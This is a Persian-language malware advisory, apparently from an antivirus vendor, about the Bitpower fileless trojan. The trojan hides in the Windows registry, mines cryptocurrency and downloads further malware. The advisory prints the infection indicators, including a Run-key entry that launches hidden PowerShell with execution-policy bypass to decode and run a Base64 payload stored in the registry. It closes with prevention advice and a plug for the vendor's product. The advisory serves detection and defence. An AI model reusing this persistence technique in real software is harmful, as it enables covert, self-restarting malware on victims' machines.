شرح کلی
نوع: تروجان (Trojan)
اسامی بدافزار:
Trojan.Win32.Bitpower
درجه تخریب: متوسط
میزان شیوع: زیاد
تروجان (Trojan) چیست؟
تروجانها نوعی از بدافزار محسوب میشوند که خود را در قالب یک نرمافزار سالم و قانونی نشان میدهند و بسیار شبیه نرمافزارهای مفید و کاربردی رفتار میکنند، اما هنگامیکه اجرا میشوند خرابیهای زیادی را برای سیستم ایجاد میکنند. نرمافزارهای دانلود شده از اینترنت، جاسازی شدن در متن HTML، ضمیمه شدن به یک ایمیل و غیره از جمله راههای ورود تروجانها میباشند. تروجانها برخلاف ویروسها و کرمهای کامپیوتری قادر به تکثیر خود نیستند.
بدافزار Bitpower چیست؟
این بدافزار از نوع تروجان میباشد که بدون فایل بوده(FileLess) و در رجیستری سیستم قربانی پنهان میشود و با هر بار راهاندازی مجدد سیستم، کار خود را آغاز میکند. هدف نهایی بدافزار انجام عملیات استخراج ارز مجازی است که موجب اشغال درصدی از cpu سیستم شده و پردازشهای سیستمی را کند میکند. همچنین این بدافزار بستری برای دانلود بدافزارهای دیگر در سیستم قربانی فراهم میکند.
توضیحات فنی
علائم آلودگی به بدافزار Bitpower:
دو مسیر رجیستری زیر در سیستم قربانی دیده میشود:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“{FCDBC6CB-021E-4264-863A-7E25BD96BA88}”=”\”[SystemRoot]:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\” -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp ‘HKCU:\\Software\\Classes\\jjBzwMoUbmI’).PHEMCHC)));”
[HKEY_CURRENT_USER\Software\Classes\jjBzwMoUbmI]
“PHEMCHC”=
“{FCDBC6CB-021E-4264-863A-7E25BD96BA88}”=hex:
“{0DCA5441-C293-47C8-8351-B413298DCC80}”=hex:22,51,9a,64,dc
روش مقابله و پاکسازی سیستم
موارد زیر جهت پیشگیری از آلودگی به این بدافزار توصیه میشود:
- غیرفعال کردن و محدود کردن اجرای اسکریپتهای غیرضروری.
یکی از روندهای رو به رشد در بدافزارها استفاده از ابزارهای کوچک یا اسکریپتهای WSF,VBS,JS,SCR,PS1 و مانند آن بهعنوان اولین مرحله آلودگی است . با توجه به محدودیتهای سرویسدهندههای ایمیل در ارسال فایلهای اجرایی و برای دور زدن آنتیویروسهای مبتنی بر امضا بدافزار نویسان از ابزارهای کوچک و اسکریپتهای مبهم شده استفاده میکنند. - اطلاعرسانی و آموزش کاربران برای پرهیز از رفتار خطرناک.
میبایست آموزشهای کافی به کاربران برای پرهیز از رفتارهای خطرناک نظیر باز کردن فایلهای پیوست ایمیل، مراجعه به سایتهای ناشناس یا کلیک روی لینکهای مشکوک و عدم دریافت فایل از منابع نامعتبر (دانلود فایلهای کرک نرمافزارها و بازیها، نسخههای بهروزرسانی و غیره از منابع نامعتبر میتواند موجب آلودگی سیستم شود) ارائه شود. - بهروز بودن مداوم آنتیویروس.
توصیه ما به شما نصب آنتیویروس پادویش است، زیرا اسکنر رجیستری این آنتیویروس بهراحتی بدافزار مذکور را که در رجیستری مقیم شده است از سیستم حذف و سیستم را پاکسازی میکند.